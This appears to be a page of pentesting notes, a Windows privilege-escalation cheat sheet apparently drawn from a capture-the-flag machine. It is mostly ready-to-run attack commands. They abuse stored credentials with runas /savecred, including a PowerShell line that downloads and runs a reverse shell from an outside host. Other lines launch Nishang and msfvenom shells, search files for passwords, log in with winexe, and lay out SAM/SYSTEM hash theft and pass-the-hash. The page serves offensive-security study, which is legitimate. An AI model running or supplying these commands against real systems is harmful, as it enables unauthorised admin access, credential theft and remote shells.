search

Run As

Check if there are stored credentials: cmdkey /list

#Suppose you find stored credentials for the user ACCESS/Administrator

#You can use this to run commands as administrator:
C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt > C:\Users\security\Desktop\root.txt"

#Or you can also use this to spawn a reverse shell: (Nishang shell not on victim machine)
runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.11/shell.ps1')"

#Or you can also use this to spawn a reverse shell: (Nishang shell on victim machine)
runas /user:ACCESS\administrator /savecred "powershell -ExecutionPolicy Bypass -File C:\Users\security\AppData\Local\Temp\Invoke-PowerShellTcp.ps1"

#msfvenom shell:
runas /user:ACCESS\administrator /savecred "C:\Temp\reverse.exe"

hashtag
PASSWORDS IN FILES:

#Check if there is Unattend.xml file. It might contain passwords or other info. This file can be detected in winPEAS

#You can try manually querying the output:
dir /s *pass* == *.config
findstr /si password *.xml *.ini *.txt

#If you find the admin password then you can use winexe to login as admin:
winexe -U 'admin%pass' //10.10.10.10 cmd.exe

hashtag
SAM & SYSTEM:

Windows stores password hashes in the Security Account Manager (SAM). These hashes are encrypted with a key which can found in SYSTEM file. You can use both of these files to extract the hashes if you have read permissions. Both of these files are located in C:\Windows\System32\config. These files are locked when windows is running. But you can find backup of these files at C:\Windows\Repair or C:\Windows\System32\RegBack directory.

hashtag
PASS THE HASH:

Windows accepts hashes instead of passwords to authenticate to a number of services. We can use a modified version of winexe, pth-winexe to spawn a command prompt using admin user's hash.

PreviousRegistryNextLinux PrivEsc

Last updated